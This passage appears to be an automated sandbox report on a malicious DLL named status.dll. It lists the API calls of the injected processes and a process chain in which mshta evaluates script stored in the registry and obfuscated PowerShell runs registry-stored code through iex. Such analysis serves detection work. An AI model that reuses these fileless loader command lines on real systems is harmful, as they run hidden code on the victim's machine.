            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0AB8 NtProtectVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_00FE0880 NtAllocateVirtualMemory,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B141EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B03D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0DC0B NtQueryInformationProcess,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1EC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B143A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1DBFA NtQuerySystemInformation,RtlNtStatusToDosError,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B13B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0EB58 memset,NtQueryInformationProcess,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B061AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1A044 NtGetContextThread,RtlNtStatusToDosError,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B116BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B1D52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_03B0C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D42A0A NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D4462B GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D477BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_02D48401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960880 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_00960AB8 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EDC0B NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FEC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E3D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EF6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F41EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EC423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FD52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F16BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EC084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EB012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FA044 NtGetContextThread,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048E61AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F43A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048FDBFA NtQuerySystemInformation,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048F3B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 4_2_048EEB58 memset,NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA462B GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA2A0A NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04AA8401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0880 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_031C0AB8 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05913D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591DC0B NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592EC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059241EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592D52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059216BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059161AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592A044 NtGetContextThread,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_059243A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0592DBFA NtQuerySystemInformation,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_05923B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_0591EB58 memset,NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC462B GetProcAddress,NtCreateSection,memset,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC2A0A NtMapViewOfSection,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC77BB NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00AC8401 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A41EE memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099ECB4 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099DC0B NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009AEC5A RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A945C GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_00993D90 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099F6C4 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099C084 VirtualAlloc,VirtualAlloc,GetLastError,GetLastError,SwitchToThread,GetLastError,GetLastError,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlExitUserThread,NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099B012 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009AA044 NtGetContextThread,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009961AD OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A43A0 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009ADBFA NtQuerySystemInformation,RtlNtStatusToDosError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A3B11 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099EB58 memset,NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0099C423 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009AD52D NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_009A16BA NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
            Source: status.dll ReversingLabs: Detection: 23%
            Source: status.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\status.dll"
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer
            Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17422 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82956 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:17430 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3608 CREDAT:82992 /prefetch:2
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Bn49='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bn49).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name egwasf -value gp; new-alias -name uewhvlo -value iex; uewhvlo ([System.Text.Encoding]::ASCII.GetString((egwasf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name viccxg -value gp; new-alias -name qooxkryog -value iex; qooxkryog ([System.Text.Encoding]::ASCII.GetString((viccxg "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ltid='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ltid).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name einkftwfr -value gp; new-alias -name ulhulxq -value iex; ulhulxq ([System.Text.Encoding]::ASCII.GetString((einkftwfr "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eutk2hxp\eutk2hxp.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5nzflxas\5nzflxas.cmdline
            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fyriofhk\fyriofhk.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4702.tmp" "c:\Users\user\AppData\Local\Temp\eutk2hxp\CSC3C520F3552234BD5981E8C2C19975E5B.TMP"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yycrjy0w\yycrjy0w.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES49B1.tmp" "c:\Users\user\AppData\Local\Temp\5nzflxas\CSCCA0D8D115C84DA1A0293F6BF85846.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4D3C.tmp" "c:\Users\user\AppData\Local\Temp\fyriofhk\CSC7F089C7BD9A5426483691E56FD9DB0F7.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES522D.tmp" "c:\Users\user\AppData\Local\Temp\yycrjy0w\CSCDAC2BC21A294475B86B2FDF784B11415.TMP"
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\babtdr3v\babtdr3v.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\11mxocay\11mxocay.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mrf10rqm\mrf10rqm.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vgn3eu5f\vgn3eu5f.cmdline
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES67D8.tmp" "c:\Users\user\AppData\Local\Temp\babtdr3v\CSC990A060DA8974A64BF3BB68C9993246.TMP"
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\status.dll
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\status.dll,DllRegisterServer
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xap0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xap0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\status.dll",#1
            Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tlot='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tlot).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
            Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown
            Source: C:\Windows\SysWOW64\regsvr32.exe Process created: unknown unknown
